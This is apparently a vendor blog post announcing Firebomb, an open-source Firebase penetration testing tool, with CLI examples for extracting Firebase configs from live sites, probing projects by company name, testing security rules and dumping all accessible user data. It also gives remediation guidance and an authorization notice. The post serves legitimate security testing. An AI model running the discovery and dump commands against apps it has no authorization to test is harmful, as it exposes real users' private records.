We're releasing Firebomb, our open source penetration testing tool for Firebase applications. It's the same tool powering our automated Firebase security scanning at ModernPentest.
The Firebase Security Problem
Firebase makes it incredibly easy to build applications. Point your client SDK at Google's infrastructure, write some security rules, and you have a scalable backend in minutes.
But that ease of development has created an epidemic of insecure applications:
- 916 Firebase websites exposed 125 million user records in 2024
- 31% of Firebase apps have exploitable security rules
- Most developers deploy with test mode rules and never update them
Generic security scanners don't understand Firebase's unique architecture—Firestore rules, RTDB permissions, Cloud Storage ACLs, the relationship between client SDKs and security rules. They miss the vulnerabilities that actually matter.
Firebomb changes that.
What Firebomb Does
Firebomb is a comprehensive security testing framework specifically for Firebase. It automates the complete penetration testing workflow:
1. Configuration Discovery
Firebomb automatically extracts Firebase credentials from web applications—no manual copying needed:
# Discover from a live application
uv run firebomb discover --url https://target-app.com
# Deep recursive crawl (follows all JS files)
uv run firebomb discover --url https://target-app.com --recursive
# Validate discovered configs against Firebase APIs
uv run firebomb discover --url https://target-app.com --recursive --validate
# Parse from local files
uv run firebomb discover --file bundle.js
uv run firebomb discover --har traffic.har
It finds credentials hidden in:
- Inline JavaScript and HTML
- Bundled and minified scripts (webpack, Vite, esbuild)
- Code-split chunks and lazy-loaded modules
- Next.js/React/Vue/Angular build artifacts
- Source maps (extracts original source code)
- Environment variables (
NEXT_PUBLIC_FIREBASE_*,VITE_FIREBASE_*, etc.)
2. Proactive Discovery (No Credentials Needed)
Firebomb can discover Firebase projects without extracting credentials first:
# Probe by project ID
uv run firebomb probe --project-id suspected-project
# Generate and probe from company name
uv run firebomb probe --name "Acme Corp"
# Discover from domain
uv run firebomb probe --domain acme.com
This uses DNS enumeration and direct API probing to find Firebase projects and check for misconfigurations—useful when you suspect Firebase usage but can't find the config.
3. Resource Enumeration
Once configured, Firebomb discovers all accessible Firebase resources:
uv run firebomb enum --output enumeration.json
This reveals:
- Firestore: Collections, document counts, accessible fields
- Realtime Database: Paths, data structure, accessible nodes
- Cloud Storage: Buckets, file listings, ACL configurations
- Cloud Functions: Endpoints, authentication requirements
- Authentication: Enabled providers, configuration settings
4. Security Testing
The core of Firebomb—automated vulnerability testing across all Firebase services:
uv run firebomb test --output findings.json
Firestore Testing:
- Public read/write access detection
- Missing authentication checks
- Cross-user data access vulnerabilities
- Document-level permission gaps
Realtime Database Testing:
- Public path vulnerabilities
- Wildcard permission issues
- Root-level database exposure
- Path traversal risks
Cloud Storage Testing:
- Publicly readable/writable buckets
- ACL misconfigurations
- Unauthorized file operations
Cloud Functions Testing:
- Unauthenticated function access
- CORS misconfigurations
- Missing input validation
Authentication Testing:
- Anonymous authentication enabled
- Email verification requirements
- Password policy strength
Sample Output:
┌─────────────────────────────────────────────────────────────────┐
│ Security Testing Results │
├─────────────────────────────────────────────────────────────────┤
│ Firestore: users │
│ ✗ Collection publicly readable without authentication │
│ Documents exposed: 1,847 │
│ Severity: CRITICAL │
├─────────────────────────────────────────────────────────────────┤
│ Firestore: posts │
│ ✓ Proper authentication required │
│ ✓ User-scoped access enforced │
├─────────────────────────────────────────────────────────────────┤
│ Cloud Storage: user-uploads │
│ ✗ Bucket publicly writable │
│ Risk: Arbitrary file upload/malware hosting │
│ Severity: CRITICAL │
├─────────────────────────────────────────────────────────────────┤
│ Authentication │
│ ⚠ Anonymous authentication enabled │
│ Risk: Unlimited account creation, resource abuse │
│ Severity: MEDIUM │
└─────────────────────────────────────────────────────────────────┘
5. Authenticated Testing
Test how permissions differ between anonymous and authenticated users:
# Auto-generate email with verification (recommended)
uv run firebomb signup --verify-email
# Or use manual email/password
uv run firebomb signup --email tester@example.com --password SecurePass123!
# Run tests with authentication
uv run firebomb test --auth
uv run firebomb enum --auth
This reveals privilege escalation vulnerabilities—resources that should require authentication but don't, or resources accessible to any authenticated user instead of just the owner.
6. Data Extraction
Query specific collections or paths:
# Query specific Firestore collection
uv run firebomb query --collection users --output users.json
# Query RTDB path
uv run firebomb query --path /messages --output messages.json
# Export with limits
uv run firebomb query --collection orders --limit 100 --output sample.json
7. Bulk Data Dump
Export all accessible data for evidence collection:
# Dump all accessible Firebase data
uv run firebomb dump --output evidence.json
# Dump with authentication
uv run firebomb dump --auth --output auth-evidence.json
# Dump specific collections only
uv run firebomb dump --firestore-only --collections users,orders --output data.json
# Limit documents per collection
uv run firebomb dump --limit 500 --output sample.json
The dump command fetches actual document contents from Firestore, full data trees from RTDB, and file listings from Cloud Storage.
8. Professional Reports
Generate stakeholder-ready security assessments:
# HTML report for executives
uv run firebomb report --format html --output assessment.html
# JSON report for developers
uv run firebomb report --format json --output findings.json
Reports include:
- Executive summary with risk assessment
- Detailed findings with severity classification
- CWE and OWASP mapping
- Remediation guidance with code examples
- Evidence and proof of concept
Key Features
Smart Credential & Session Management
Firebomb caches discovered configurations and authentication sessions:
# Discover and cache (default behavior)
uv run firebomb discover --url https://app.com
# Later: credentials auto-loaded
uv run firebomb enum
uv run firebomb test
# View cached configurations
uv run firebomb cached
# View cached sessions
uv run firebomb cached --sessions
# Remove specific project
uv run firebomb cached --remove my-project
# Clear all cached data
uv run firebomb cached --clear
Comprehensive Service Coverage
Unlike generic scanners, Firebomb understands all Firebase services:
| Service | What Firebomb Tests |
|---|---|
| Firestore | Rules, collection access, cross-user data leakage |
| RTDB | Permissions, path traversal, wildcard rules |
| Storage | Bucket ACLs, file type restrictions, public access |
| Functions | Authentication, CORS, input validation |
| Auth | Provider config, anonymous auth, MFA settings |
| Discovery | DNS probing, API probing, framework detection |
Severity Classification
Findings are categorized by actual risk:
- CRITICAL: Complete data exposure, write access to all data
- HIGH: Significant data leakage, unauthorized access
- MEDIUM: Configuration weaknesses, potential abuse vectors
- LOW: Best practice violations, minor issues
- INFO: Documentation, recommendations
Remediation Guidance
Every finding includes specific fix instructions:
┌─────────────────────────────────────────────────────────────────┐
│ Finding: Firestore collection 'users' publicly readable │
├─────────────────────────────────────────────────────────────────┤
│ Severity: CRITICAL │
│ CWE: CWE-284 (Improper Access Control) │
│ OWASP: A01:2021 - Broken Access Control │
├─────────────────────────────────────────────────────────────────┤
│ Current Rules: │
│ match /users/{userId} { │
│ allow read: if true; │
│ } │
├─────────────────────────────────────────────────────────────────┤
│ Recommended Fix: │
│ match /users/{userId} { │
│ allow read: if request.auth != null │
│ && request.auth.uid == userId; │
│ } │
└─────────────────────────────────────────────────────────────────┘
Advanced Capabilities
Framework Auto-Detection
Firebomb automatically detects and optimizes for modern frameworks:
-
Next.js: Parses
_buildManifest.js, follows chunk patterns - React: Handles Create React App and custom builds
- Vue/Nuxt: Detects Vue-specific bundle patterns
- Vite: Extracts from Vite build outputs
- Angular: Supports Angular CLI builds
Deep JavaScript Analysis
- Recursive crawling with configurable depth and file limits
- Webpack chunk extraction and following
- Source map parsing for original source code
- Environment variable pattern detection (
NEXT_PUBLIC_*,VITE_*, etc.) - Minified code correlation for scattered config values
Installation
Firebomb requires Python 3.11+ and uses uv for dependency management:
# Clone the repository
git clone https://github.com/ModernPentest/firebomb.git
cd firebomb
# Run with uv (handles dependencies automatically)
uv run firebomb --help
Example Workflow
Here's a complete security assessment workflow:
# 1. Discover Firebase configuration with validation
uv run firebomb discover --url https://target-app.com --recursive --validate
# 2. Or probe by company name if config not found
uv run firebomb probe --name "Target Company"
# 3. Enumerate all resources
uv run firebomb enum --output enum.json
# 4. Run security tests
uv run firebomb test --output findings.json
# 5. Create test user with auto-verification
uv run firebomb signup --verify-email
# 6. Test with authentication
uv run firebomb test --auth --output auth-findings.json
# 7. Dump evidence from vulnerable resources
uv run firebomb dump --limit 100 --output evidence.json
# 8. Generate professional report
uv run firebomb report --format html --output security-assessment.html
Responsible Use
Firebomb is designed for authorized security testing only. Always ensure you have:
- Written authorization from the Firebase project owner
- Permission to test the specific project
- Understanding of applicable laws
Never use this tool against applications you don't own or have explicit permission to test.
How It Powers ModernPentest
Firebomb is the foundation of our Firebase security scanning at ModernPentest. Our AI agents use Firebomb as their primary tool for:
- Automated Firestore rules analysis
- RTDB permission auditing
- Cloud Storage ACL testing
- Continuous monitoring for configuration drift
ModernPentest adds:
- AI-powered analysis - Agents interpret findings and prioritize by actual business risk
- Continuous scanning - Automated weekly/daily scans catch regressions
- SOC 2 reports - Auditor-ready documentation generated automatically
- Remediation guidance - Specific fix recommendations tailored to your codebase
For manual control, use Firebomb directly. For automated, continuous security with compliance reporting, try ModernPentest.
Get Started
The code is available on GitHub:
github.com/ModernPentest/firebomb
Star the repo, try it on your Firebase projects, and let us know what you find. We welcome contributions, bug reports, and feature requests.
For a deep dive into Firebase security best practices, check out our guide: Securing Firebase in Production.
Firebomb is part of our commitment to open source security tooling. Follow us for more tools and guides on securing modern web applications.
Top comments (0)